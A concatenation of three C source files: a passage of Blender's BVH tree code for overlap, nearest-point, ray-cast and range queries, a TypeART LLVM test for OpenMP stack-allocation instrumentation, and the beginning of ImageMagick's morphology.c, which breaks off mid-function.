BVHTreeOverlap *BLI_bvhtree_overlap(BVHTree *tree1, BVHTree *tree2, unsigned int *result)
{
int j;
unsigned int total = 0;
BVHTreeOverlap *overlap = NULL, *to = NULL;
BVHOverlapData **data;
// check for compatibility of both trees (can't compare 14-DOP with 18-DOP)
if((tree1->axis != tree2->axis) && (tree1->axis == 14 || tree2->axis == 14) && (tree1->axis == 18 || tree2->axis == 18))
return NULL;
// fast check root nodes for collision before doing big splitting + traversal
if(!tree_overlap(tree1->nodes[tree1->totleaf], tree2->nodes[tree2->totleaf], MIN2(tree1->start_axis, tree2->start_axis), MIN2(tree1->stop_axis, tree2->stop_axis)))
return NULL;
data = MEM_callocN(sizeof(BVHOverlapData *)* tree1->tree_type, "BVHOverlapData_star");
for(j = 0; j < tree1->tree_type; j++)
{
data[j] = (BVHOverlapData *)MEM_callocN(sizeof(BVHOverlapData), "BVHOverlapData");
// init BVHOverlapData
data[j]->overlap = (BVHTreeOverlap *)malloc(sizeof(BVHTreeOverlap)*MAX2(tree1->totleaf, tree2->totleaf));
data[j]->tree1 = tree1;
data[j]->tree2 = tree2;
data[j]->max_overlap = MAX2(tree1->totleaf, tree2->totleaf);
data[j]->i = 0;
data[j]->start_axis = MIN2(tree1->start_axis, tree2->start_axis);
data[j]->stop_axis = MIN2(tree1->stop_axis, tree2->stop_axis );
}
#pragma omp parallel for private(j) schedule(static)
for(j = 0; j < MIN2(tree1->tree_type, tree1->nodes[tree1->totleaf]->totnode); j++)
{
traverse(data[j], tree1->nodes[tree1->totleaf]->children[j], tree2->nodes[tree2->totleaf]);
}
for(j = 0; j < tree1->tree_type; j++)
total += data[j]->i;
to = overlap = (BVHTreeOverlap *)MEM_callocN(sizeof(BVHTreeOverlap)*total, "BVHTreeOverlap");
for(j = 0; j < tree1->tree_type; j++)
{
memcpy(to, data[j]->overlap, data[j]->i*sizeof(BVHTreeOverlap));
to+=data[j]->i;
}
for(j = 0; j < tree1->tree_type; j++)
{
free(data[j]->overlap);
MEM_freeN(data[j]);
}
MEM_freeN(data);
(*result) = total;
return overlap;
}
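#if 0
/* Usage sketch (illustrative only): collect every overlapping leaf pair of
 * two already-built trees. The result array is allocated with MEM_callocN
 * inside BLI_bvhtree_overlap above, so it is released with MEM_freeN. */
static void example_overlap(BVHTree *tree_a, BVHTree *tree_b)
{
unsigned int total = 0, k;
BVHTreeOverlap *pairs = BLI_bvhtree_overlap(tree_a, tree_b, &total);
for (k = 0; k < total; k++)
printf("leaf %d of A overlaps leaf %d of B\n", pairs[k].indexA, pairs[k].indexB);
if (pairs)
MEM_freeN(pairs);
}
#endif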
//Determines the nearest point of the given node BV. Returns the squared distance to that point.
static float calc_nearest_point(const float *proj, BVHNode *node, float *nearest)
{
int i;
const float *bv = node->bv;
//nearest on AABB hull
for(i=0; i != 3; i++, bv += 2)
{
if(bv[0] > proj[i])
nearest[i] = bv[0];
else if(bv[1] < proj[i])
nearest[i] = bv[1];
else
nearest[i] = proj[i];
}
/*
//nearest on a general hull
VECCOPY(nearest, data->co);
for(i = data->tree->start_axis; i != data->tree->stop_axis; i++, bv+=2)
{
float proj = dot_v3v3( nearest, KDOP_AXES[i]);
float dl = bv[0] - proj;
float du = bv[1] - proj;
if(dl > 0)
{
VECADDFAC(nearest, nearest, KDOP_AXES[i], dl);
}
else if(du < 0)
{
VECADDFAC(nearest, nearest, KDOP_AXES[i], du);
}
}
*/
return len_squared_v3v3(proj, nearest);
}
typedef struct NodeDistance
{
BVHNode *node;
float dist;
} NodeDistance;
#define NodeDistance_priority(a,b) ( (a).dist < (b).dist )
// TODO: use a priority queue to reduce the number of nodes visited
static void dfs_find_nearest_dfs(BVHNearestData *data, BVHNode *node)
{
if(node->totnode == 0)
{
if(data->callback)
data->callback(data->userdata , node->index, data->co, &data->nearest);
else
{
data->nearest.index = node->index;
data->nearest.dist = calc_nearest_point(data->proj, node, data->nearest.co);
}
}
else
{
//Better heuristic: pick the closest child to descend into first
int i;
float nearest[3];
if(data->proj[ node->main_axis ] <= node->children[0]->bv[node->main_axis*2+1])
{
for(i=0; i != node->totnode; i++)
{
if( calc_nearest_point(data->proj, node->children[i], nearest) >= data->nearest.dist) continue;
dfs_find_nearest_dfs(data, node->children[i]);
}
}
else
{
for(i=node->totnode-1; i >= 0 ; i--)
{
if( calc_nearest_point(data->proj, node->children[i], nearest) >= data->nearest.dist) continue;
dfs_find_nearest_dfs(data, node->children[i]);
}
}
}
}
static void dfs_find_nearest_begin(BVHNearestData *data, BVHNode *node)
{
float nearest[3], sdist;
sdist = calc_nearest_point(data->proj, node, nearest);
if(sdist >= data->nearest.dist) return;
dfs_find_nearest_dfs(data, node);
}
#if 0
static void NodeDistance_push_heap(NodeDistance *heap, int heap_size)
PUSH_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size)
static void NodeDistance_pop_heap(NodeDistance *heap, int heap_size)
POP_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size)
//NN function that uses a heap.. this function leads to an optimal number of min-distance
//computations, but for normal tri-faces and a 6-DOP BV, a simple dfs with local heuristics (as implemented
//in source/blender/blenkernel/intern/shrinkwrap.c) works faster.
//
//It may make sense to use this function if the callback queries are very slow.. or if it's impossible
//to get a nice heuristic
//
//this function uses "malloc/free" instead of the MEM_* ones because it intends to be OpenMP safe
static void bfs_find_nearest(BVHNearestData *data, BVHNode *node)
{
int i;
NodeDistance default_heap[DEFAULT_FIND_NEAREST_HEAP_SIZE];
NodeDistance *heap=default_heap, current;
int heap_size = 0, max_heap_size = sizeof(default_heap)/sizeof(default_heap[0]);
float nearest[3];
int callbacks = 0, push_heaps = 0;
if(node->totnode == 0)
{
dfs_find_nearest_dfs(data, node);
return;
}
current.node = node;
current.dist = calc_nearest_point(data->proj, node, nearest);
while(current.dist < data->nearest.dist)
{
// printf("%f : %f\n", current.dist, data->nearest.dist);
for(i=0; i< current.node->totnode; i++)
{
BVHNode *child = current.node->children[i];
if(child->totnode == 0)
{
callbacks++;
dfs_find_nearest_dfs(data, child);
}
else
{
//adjust heap size
if(heap_size >= max_heap_size
&& ADJUST_MEMORY(default_heap, (void**)&heap, heap_size+1, &max_heap_size, sizeof(heap[0])) == FALSE)
{
printf("WARNING: bvh_find_nearest got out of memory\n");
if(heap != default_heap)
free(heap);
return;
}
heap[heap_size].node = current.node->children[i];
heap[heap_size].dist = calc_nearest_point(data->proj, current.node->children[i], nearest);
if(heap[heap_size].dist >= data->nearest.dist) continue;
heap_size++;
NodeDistance_push_heap(heap, heap_size);
// PUSH_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size);
push_heaps++;
}
}
if(heap_size == 0) break;
current = heap[0];
NodeDistance_pop_heap(heap, heap_size);
// POP_HEAP_BODY(NodeDistance, NodeDistance_priority, heap, heap_size);
heap_size--;
}
// printf("hsize=%d, callbacks=%d, pushs=%d\n", heap_size, callbacks, push_heaps);
if(heap != default_heap)
free(heap);
}
#endif
int BLI_bvhtree_find_nearest(BVHTree *tree, const float *co, BVHTreeNearest *nearest, BVHTree_NearestPointCallback callback, void *userdata)
{
int i;
BVHNearestData data;
BVHNode* root = tree->nodes[tree->totleaf];
//init data to search
data.tree = tree;
data.co = co;
data.callback = callback;
data.userdata = userdata;
for(i = data.tree->start_axis; i != data.tree->stop_axis; i++)
{
data.proj[i] = dot_v3v3(data.co, KDOP_AXES[i]);
}
if(nearest)
{
memcpy( &data.nearest , nearest, sizeof(*nearest) );
}
else
{
data.nearest.index = -1;
data.nearest.dist = FLT_MAX;
}
//dfs search
if(root)
dfs_find_nearest_begin(&data, root);
//copy back results
if(nearest)
{
memcpy(nearest, &data.nearest, sizeof(*nearest));
}
return data.nearest.index;
}
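#if 0
/* Usage sketch (illustrative only): nearest-leaf query with no callback, so
 * the default point-to-BV distance of calc_nearest_point() is used. Note
 * that 'dist' holds a squared distance, matching calc_nearest_point(). */
static int example_find_nearest(BVHTree *tree, const float point[3])
{
BVHTreeNearest nearest;
nearest.index = -1;
nearest.dist = FLT_MAX; /* the search is pruned against this value */
return BLI_bvhtree_find_nearest(tree, point, &nearest, NULL, NULL);
}
#endif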
/*
* Raycast - BLI_bvhtree_ray_cast
*
* raycast is done by performing a DFS on the BVHTree and saving the closest hit
*/
//Determines the distance that the ray must travel to hit the bounding volume of the given node
static float ray_nearest_hit(BVHRayCastData *data, float *bv)
{
int i;
float low = 0, upper = data->hit.dist;
for(i=0; i != 3; i++, bv += 2)
{
if(data->ray_dot_axis[i] == 0.0f)
{
//axis aligned ray
if(data->ray.origin[i] < bv[0] - data->ray.radius
|| data->ray.origin[i] > bv[1] + data->ray.radius)
return FLT_MAX;
}
else
{
float ll = (bv[0] - data->ray.radius - data->ray.origin[i]) / data->ray_dot_axis[i];
float lu = (bv[1] + data->ray.radius - data->ray.origin[i]) / data->ray_dot_axis[i];
if(data->ray_dot_axis[i] > 0.0f)
{
if(ll > low) low = ll;
if(lu < upper) upper = lu;
}
else
{
if(lu > low) low = lu;
if(ll < upper) upper = ll;
}
if(low > upper) return FLT_MAX;
}
}
return low;
}
//Determines the distance that the ray must travel to hit the bounding volume of the given node
//Based on Tactical Optimization of Ray/Box Intersection, by Graham Fyffe
//[http://tog.acm.org/resources/RTNews/html/rtnv21n1.html#art9]
//
//TODO: this doesn't take data->ray.radius into consideration
static float fast_ray_nearest_hit(const BVHRayCastData *data, const BVHNode *node)
{
const float *bv = node->bv;
float dist;
float t1x = (bv[data->index[0]] - data->ray.origin[0]) * data->idot_axis[0];
float t2x = (bv[data->index[1]] - data->ray.origin[0]) * data->idot_axis[0];
float t1y = (bv[data->index[2]] - data->ray.origin[1]) * data->idot_axis[1];
float t2y = (bv[data->index[3]] - data->ray.origin[1]) * data->idot_axis[1];
float t1z = (bv[data->index[4]] - data->ray.origin[2]) * data->idot_axis[2];
float t2z = (bv[data->index[5]] - data->ray.origin[2]) * data->idot_axis[2];
if(t1x > t2y || t2x < t1y || t1x > t2z || t2x < t1z || t1y > t2z || t2y < t1z) return FLT_MAX;
if(t2x < 0.0f || t2y < 0.0f || t2z < 0.0f) return FLT_MAX;
if(t1x > data->hit.dist || t1y > data->hit.dist || t1z > data->hit.dist) return FLT_MAX;
dist = t1x;
if (t1y > dist) dist = t1y;
if (t1z > dist) dist = t1z;
return dist;
}
static void dfs_raycast(BVHRayCastData *data, BVHNode *node)
{
int i;
//ray-bv is really fast.. and simple tests revealed it's worth testing it
//before calling the ray-primitive functions
/* XXX: temporary solution for particles until fast_ray_nearest_hit supports ray.radius */
float dist = (data->ray.radius > 0.0f) ? ray_nearest_hit(data, node->bv) : fast_ray_nearest_hit(data, node);
if(dist >= data->hit.dist) return;
if(node->totnode == 0)
{
if(data->callback)
data->callback(data->userdata, node->index, &data->ray, &data->hit);
else
{
data->hit.index = node->index;
data->hit.dist = dist;
VECADDFAC(data->hit.co, data->ray.origin, data->ray.direction, dist);
}
}
else
{
//pick loop direction to dive into the tree (based on ray direction and split axis)
if(data->ray_dot_axis[ (int)node->main_axis ] > 0.0f)
{
for(i=0; i != node->totnode; i++)
{
dfs_raycast(data, node->children[i]);
}
}
else
{
for(i=node->totnode-1; i >= 0; i--)
{
dfs_raycast(data, node->children[i]);
}
}
}
}
#if 0
static void iterative_raycast(BVHRayCastData *data, BVHNode *node)
{
while(node)
{
float dist = fast_ray_nearest_hit(data, node);
if(dist >= data->hit.dist)
{
node = node->skip[1];
continue;
}
if(node->totnode == 0)
{
if(data->callback)
data->callback(data->userdata, node->index, &data->ray, &data->hit);
else
{
data->hit.index = node->index;
data->hit.dist = dist;
VECADDFAC(data->hit.co, data->ray.origin, data->ray.direction, dist);
}
node = node->skip[1];
}
else
{
node = node->children[0];
}
}
}
#endif
int BLI_bvhtree_ray_cast(BVHTree *tree, const float *co, const float *dir, float radius, BVHTreeRayHit *hit, BVHTree_RayCastCallback callback, void *userdata)
{
int i;
BVHRayCastData data;
BVHNode * root = tree->nodes[tree->totleaf];
data.tree = tree;
data.callback = callback;
data.userdata = userdata;
VECCOPY(data.ray.origin, co);
VECCOPY(data.ray.direction, dir);
data.ray.radius = radius;
normalize_v3(data.ray.direction);
for(i=0; i<3; i++)
{
data.ray_dot_axis[i] = dot_v3v3(data.ray.direction, KDOP_AXES[i]);
data.idot_axis[i] = 1.0f / data.ray_dot_axis[i];
if(fabsf(data.ray_dot_axis[i]) < FLT_EPSILON)
{
data.ray_dot_axis[i] = 0.0;
}
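/* Precompute, per axis, which BV bound (min or max) is the near slab
 * plane for this ray direction, so fast_ray_nearest_hit() can index
 * bv[] directly instead of branching on the direction sign. */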
data.index[2*i] = data.idot_axis[i] < 0.0f ? 1 : 0;
data.index[2*i+1] = 1 - data.index[2*i];
data.index[2*i] += 2*i;
data.index[2*i+1] += 2*i;
}
if(hit)
memcpy( &data.hit, hit, sizeof(*hit) );
else
{
data.hit.index = -1;
data.hit.dist = FLT_MAX;
}
if(root)
{
dfs_raycast(&data, root);
// iterative_raycast(&data, root);
}
if(hit)
memcpy( hit, &data.hit, sizeof(*hit) );
return data.hit.index;
}
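#if 0
/* Usage sketch (illustrative only): cast a ray from 'origin' along 'dir'
 * (radius 0, no callback) and return the nearest leaf index, or -1 if
 * nothing was hit within FLT_MAX distance. */
static int example_ray_cast(BVHTree *tree, const float origin[3], const float dir[3])
{
BVHTreeRayHit hit;
hit.index = -1;
hit.dist = FLT_MAX;
BLI_bvhtree_ray_cast(tree, origin, dir, 0.0f, &hit, NULL, NULL);
return hit.index;
}
#endif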
float BLI_bvhtree_bb_raycast(float *bv, float *light_start, float *light_end, float *pos)
{
BVHRayCastData data;
float dist = 0.0;
data.hit.dist = FLT_MAX;
// get light direction
data.ray.direction[0] = light_end[0] - light_start[0];
data.ray.direction[1] = light_end[1] - light_start[1];
data.ray.direction[2] = light_end[2] - light_start[2];
data.ray.radius = 0.0;
data.ray.origin[0] = light_start[0];
data.ray.origin[1] = light_start[1];
data.ray.origin[2] = light_start[2];
normalize_v3(data.ray.direction);
VECCOPY(data.ray_dot_axis, data.ray.direction);
dist = ray_nearest_hit(&data, bv);
if(dist > 0.0f)
{
VECADDFAC(pos, light_start, data.ray.direction, dist);
}
return dist;
}
/*
* Range Query - as requested by broken :P
*
* Calls the given callback for every leaf node whose BV lies within the
* given spherical range (center, radius).
* Returns the number of hits found.
*/
typedef struct RangeQueryData
{
BVHTree *tree;
const float *center;
float radius; //squared radius
int hits;
BVHTree_RangeQuery callback;
void *userdata;
} RangeQueryData;
static void dfs_range_query(RangeQueryData *data, BVHNode *node)
{
if(node->totnode == 0)
{
#if 0 /*UNUSED*/
//Calculate the node min-coords (if the node was a point then this is the point coordinates)
float co[3];
co[0] = node->bv[0];
co[1] = node->bv[2];
co[2] = node->bv[4];
#endif
}
else
{
int i;
for(i=0; i != node->totnode; i++)
{
float nearest[3];
float dist = calc_nearest_point(data->center, node->children[i], nearest);
if(dist < data->radius)
{
//It's a leaf.. call the callback
if(node->children[i]->totnode == 0)
{
data->hits++;
data->callback( data->userdata, node->children[i]->index, dist );
}
else
dfs_range_query( data, node->children[i] );
}
}
}
}
int BLI_bvhtree_range_query(BVHTree *tree, const float *co, float radius, BVHTree_RangeQuery callback, void *userdata)
{
BVHNode * root = tree->nodes[tree->totleaf];
RangeQueryData data;
data.tree = tree;
data.center = co;
data.radius = radius*radius;
data.hits = 0;
data.callback = callback;
data.userdata = userdata;
if(root != NULL)
{
float nearest[3];
float dist = calc_nearest_point(data.center, root, nearest);
if(dist < data.radius)
{
//It's a leaf.. call the callback
if(root->totnode == 0)
{
data.hits++;
data.callback( data.userdata, root->index, dist );
}
else
dfs_range_query( &data, root );
}
}
return data.hits;
}
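#if 0
/* Usage sketch (illustrative only): report every leaf within 'radius' of a
 * point. The callback receives the squared distance, as computed by
 * calc_nearest_point() and compared against the squared radius above. */
static void example_range_cb(void *userdata, int index, float dist_sq)
{
(void)userdata;
printf("leaf %d at squared distance %f\n", index, dist_sq);
}
static int example_range_query(BVHTree *tree, const float point[3], float radius)
{
return BLI_bvhtree_range_query(tree, point, radius, example_range_cb, NULL);
}
#endif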
|
20_omp_priv_combi_nested.c | // clang-format off
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | %apply-typeart -typeart-alloca -call-filter -S 2>&1 | FileCheck %s
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | opt -O2 -S | %apply-typeart -typeart-alloca -call-filter -S 2>&1 | FileCheck %s --check-prefix=check-opt
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | %apply-typeart -typeart-alloca -call-filter -S | FileCheck %s --check-prefix=check-inst
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | opt -O2 -S | %apply-typeart -typeart-alloca -call-filter -S | FileCheck %s --check-prefix=check-opt-inst
// REQUIRES: openmp
// clang-format on
#include "omp.h"
// NOTE: with opt, the compiler forwards the original address to the MPI_Send, hence
// only the initial allocation is tracked.
extern void MPI_Send(void*, int);
void func(int* x, int* e) {
// check-inst: define {{.*}} @func
// check-inst-NOT: call void @__typeart_alloc_stack
// check-opt-inst: define {{.*}} @func
// check-opt-inst-NOT: call void @__typeart_alloc_stack
// check-inst: define {{.*}} @.omp_outlined
// check-inst: call void @__typeart_alloc_stack_omp(i8* %0, i32 10, i64 1)
// check-opt-inst: define {{.*}} @.omp_outlined
// check-opt-inst-NOT: call void @__typeart_alloc_stack_omp
#pragma omp parallel for firstprivate(x), lastprivate(x), shared(e)
for (int i = 0; i < 10; ++i) {
// Analysis should not filter x, but e...
MPI_Send((void*)x, *e);
}
}
void foo() {
// check-inst: define {{.*}} @foo
// check-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
// check-opt-inst: define {{.*}} @foo
// check-opt-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
int x = 1;
int y = 2;
#pragma omp parallel
{ func(&x, &y); }
}
void func_other(int* x, int* e) {
// check-inst: define {{.*}} @func_other
// check-inst-NOT: call void @__typeart_alloc_stack
// check-opt-inst: define {{.*}} @func_other
// check-opt-inst-NOT: call void @__typeart_alloc_stack
// check-inst: define {{.*}} @.omp_outlined
// check-inst: call void @__typeart_alloc_stack_omp(i8* %0, i32 10, i64 1)
// check-opt-inst: define {{.*}} @.omp_outlined
// check-opt-inst-NOT: call void @__typeart_alloc_stack_omp
#pragma omp parallel for firstprivate(x), lastprivate(x), shared(e)
for (int i = 0; i < 10; ++i) {
// Analysis should not filter x, but e...
MPI_Send(x, *e);
}
MPI_Send(x, *e);
}
void bar(int x_other) {
// check-inst: define {{.*}} @bar
// check-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
// check-opt-inst: define {{.*}} @bar
// check-opt-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
int x = x_other;
int y = 2;
#pragma omp parallel
{ func_other(&x, &y); }
}
// CHECK: TypeArtPass [Heap & Stack]
// CHECK-NEXT: Malloc : 0
// CHECK-NEXT: Free : 0
// CHECK-NEXT: Alloca : 4
// CHECK-NEXT: Global : 0
// check-opt: TypeArtPass [Heap & Stack]
// check-opt: Malloc : 0
// check-opt: Free : 0
// check-opt: Alloca : 2
// check-opt: Global : 0 |
morphology.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M M OOO RRRR PPPP H H OOO L OOO GGGG Y Y %
% MM MM O O R R P P H H O O L O O G Y Y %
% M M M O O RRRR PPPP HHHHH O O L O O G GGG Y %
% M M O O R R P H H O O L O O G G Y %
% M M OOO R R P H H OOO LLLLL OOO GGG Y %
% %
% %
% MagickCore Morphology Methods %
% %
% Software Design %
% Anthony Thyssen %
% January 2010 %
% %
% %
% Copyright 1999-2017 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% Morphology is the application of various kernels, of any size or shape, to an
% image in various ways (typically binary, but not always).
%
% Convolution (weighted sum or average) is just one specific type of
% morphology, one that is very common for image blurring and sharpening
% effects. Not only 2D Gaussian blurring, but also 2-pass 1D blurring.
%
% This module provides not only a general morphology function, and the ability
% to apply more advanced or iterative morphologies, but also functions for the
% generation of many different types of kernel arrays from user supplied
% arguments. Perhaps even the generation of a kernel from a small image.
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/artifact.h"
#include "MagickCore/cache-view.h"
#include "MagickCore/channel.h"
#include "MagickCore/color-private.h"
#include "MagickCore/enhance.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/gem.h"
#include "MagickCore/gem-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/linked-list.h"
#include "MagickCore/list.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/memory-private.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/morphology.h"
#include "MagickCore/morphology-private.h"
#include "MagickCore/option.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/pixel-private.h"
#include "MagickCore/prepress.h"
#include "MagickCore/quantize.h"
#include "MagickCore/resource_.h"
#include "MagickCore/registry.h"
#include "MagickCore/semaphore.h"
#include "MagickCore/splay-tree.h"
#include "MagickCore/statistic.h"
#include "MagickCore/string_.h"
#include "MagickCore/string-private.h"
#include "MagickCore/thread-private.h"
#include "MagickCore/token.h"
#include "MagickCore/utility.h"
#include "MagickCore/utility-private.h"
/*
Other global definitions used by module.
*/
#define Minimize(assign,value) assign=MagickMin(assign,value)
#define Maximize(assign,value) assign=MagickMax(assign,value)
/* Integer Factorial Function - for a Binomial kernel */
#if 1
static inline size_t fact(size_t n)
{
size_t f,l;
for(f=1, l=2; l <= n; f=f*l, l++);
return(f);
}
#elif 1 /* glibc floating point alternatives */
#define fact(n) ((size_t)tgamma((double)n+1))
#else
#define fact(n) ((size_t)exp(lgamma((double)n+1))) /* lgamma() returns log(n!), so exponentiate */
#endif
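/* e.g. fact(4) == 24. Note that size_t overflows for n > 20 on 64-bit
** builds (n > 12 on 32-bit), so this is only suited to the small kernel
** widths used by the Binomial kernel below. */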
/* Currently these are only internal to this module */
static void
CalcKernelMetaData(KernelInfo *),
ExpandMirrorKernelInfo(KernelInfo *),
ExpandRotateKernelInfo(KernelInfo *, const double),
RotateKernelInfo(KernelInfo *, double);
/* Quick function to find last kernel in a kernel list */
static inline KernelInfo *LastKernelInfo(KernelInfo *kernel)
{
while (kernel->next != (KernelInfo *) NULL)
kernel=kernel->next;
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelInfo() takes the given string (generally supplied by the
% user) and converts it into a Morphology/Convolution Kernel. This allows
% users to specify a kernel from a number of pre-defined kernels, or to fully
% specify their own kernel for a specific Convolution or Morphology
% Operation.
%
% The kernel so generated can be any rectangular array of floating point
% values (doubles) with the 'control point' or 'pixel being affected'
% anywhere within that array of values.
%
% Previously IM was restricted to a square of odd size using the exact
% center as origin. This is no longer the case: any rectangular kernel
% may be used, with any element declared as the origin. This in turn
% allows the use of highly asymmetrical kernels.
%
% The floating point values in the kernel can also include a special value
% known as 'nan' or 'not a number' to indicate that this value is not part
% of the kernel array. This allows you to shape the kernel within its
% rectangular area. That is 'nan' values provide a 'mask' for the kernel
% shape. However at least one non-nan value must be provided for correct
% working of a kernel.
%
% The returned kernel should be freed using the DestroyKernelInfo() when you
% are finished with it. Do not free this memory yourself.
%
% Input kernel definition strings can consist of any of three types.
%
% "name:args[[@><]"
% Select from one of the built in kernels, using the name and
% geometry arguments supplied. See AcquireKernelBuiltIn()
%
% "WxH[+X+Y][@><]:num, num, num ..."
% a kernel of size W by H, with W*H floating point numbers following.
% The 'center' can optionally be defined at +X+Y (such that +0+0
% is the top left corner). If not defined, the pixel in the center for
% odd sizes, or the pixel to the immediate top or left of center for
% even sizes, is automatically selected.
%
% "num, num, num, num, ..."
% list of floating point numbers defining an 'old style' odd sized
% square kernel. At least 9 values should be provided for a 3x3
% square kernel, 25 for a 5x5 square kernel, 49 for 7x7, etc.
% Values can be space or comma separated. This is not recommended.
%
% You can define a 'list of kernels' which can be used by some morphology
% operators. A list is defined as a semicolon-separated list of kernels.
%
% " kernel ; kernel ; kernel ; "
%
% Any extra ';' characters, at start, end or between kernel definitions are
% simply ignored.
%
% The special flags will expand a single kernel, into a list of rotated
% kernels. A '@' flag will expand a 3x3 kernel into a list of 45-degree
% cyclic rotations, while a '>' will generate a list of 90-degree rotations.
% The '<' also expands using 90-degree rotates, but gives a 180-degree
% reflected kernel before the +/- 90-degree rotations, which can be important
% for Thinning operations.
%
% Note that 'name' kernels will start with an alphabetic character while the
% new kernel specification has a ':' character in its specification string.
% If neither is the case, it is assumed an old style of a simple list of
% numbers generating an odd-sized square kernel has been given.
%
% The format of the AcquireKernelInfo method is:
%
% KernelInfo *AcquireKernelInfo(const char *kernel_string)
%
% A description of each parameter follows:
%
% o kernel_string: the Morphology/Convolution kernel wanted.
%
*/
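/* Illustrative usage sketch (not part of the module): parsing a
** user-defined 3x3 sharpening kernel with an explicit +1+1 origin, in the
** "WxH+X+Y:num,..." form documented above. Disabled in the same '#if 0'
** style used by the other dormant examples in this file.
*/
#if 0
static void example_user_kernel(ExceptionInfo *exception)
{
  KernelInfo
    *kernel;

  kernel=AcquireKernelInfo("3x3+1+1: 0,-1,0 -1,5,-1 0,-1,0",exception);
  if (kernel != (KernelInfo *) NULL)
    kernel=DestroyKernelInfo(kernel);
}
#endif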
/* This was separated so that it could be used as a separate
** array input handling function, such as for -color-matrix
*/
static KernelInfo *ParseKernelArray(const char *kernel_string)
{
KernelInfo
*kernel;
char
token[MagickPathExtent];
const char
*p,
*end;
register ssize_t
i;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
MagickStatusType
flags;
GeometryInfo
args;
kernel=(KernelInfo *) AcquireQuantumMemory(1,sizeof(*kernel));
if (kernel == (KernelInfo *) NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = UserDefinedKernel;
kernel->next = (KernelInfo *) NULL;
kernel->signature=MagickCoreSignature;
if (kernel_string == (const char *) NULL)
return(kernel);
/* find end of this specific kernel definition string */
end = strchr(kernel_string, ';');
if ( end == (char *) NULL )
end = strchr(kernel_string, '\0');
/* clear flags - for Expanding kernel lists through rotations */
flags = NoValue;
/* Has a ':' in argument - New user kernel specification
FUTURE: this split on ':' could be done by StringToken()
*/
p = strchr(kernel_string, ':');
if ( p != (char *) NULL && p < end)
{
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, kernel_string, (size_t) (p-kernel_string));
token[p-kernel_string] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
/* Size handling and checks of geometry settings */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 1.0; /* then width = 1 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
kernel->width = (size_t)args.rho;
kernel->height = (size_t)args.sigma;
/* Offset Handling and Checks */
if ( args.xi < 0.0 || args.psi < 0.0 )
return(DestroyKernelInfo(kernel));
kernel->x = ((flags & XValue)!=0) ? (ssize_t)args.xi
: (ssize_t) (kernel->width-1)/2;
kernel->y = ((flags & YValue)!=0) ? (ssize_t)args.psi
: (ssize_t) (kernel->height-1)/2;
if ( kernel->x >= (ssize_t) kernel->width ||
kernel->y >= (ssize_t) kernel->height )
return(DestroyKernelInfo(kernel));
p++; /* advance beyond the ':' */
}
else
{ /* ELSE - Old old specification, forming odd-square kernel */
/* count up number of values given */
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
for (i=0; p < end; i++)
{
GetNextToken(p,&p,MagickPathExtent,token);
if (*token == ',')
GetNextToken(p,&p,MagickPathExtent,token);
}
/* set the size of the kernel - old sized square */
kernel->width = kernel->height= (size_t) sqrt((double) i+1.0);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
}
/* Read in the kernel values from rest of input string argument */
kernel->values=(MagickRealType *) MagickAssumeAligned(AcquireAlignedMemory(
kernel->width,kernel->height*sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
kernel->minimum=MagickMaximumValue;
kernel->maximum=(-MagickMaximumValue);
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; (i < (ssize_t) (kernel->width*kernel->height)) && (p < end); i++)
{
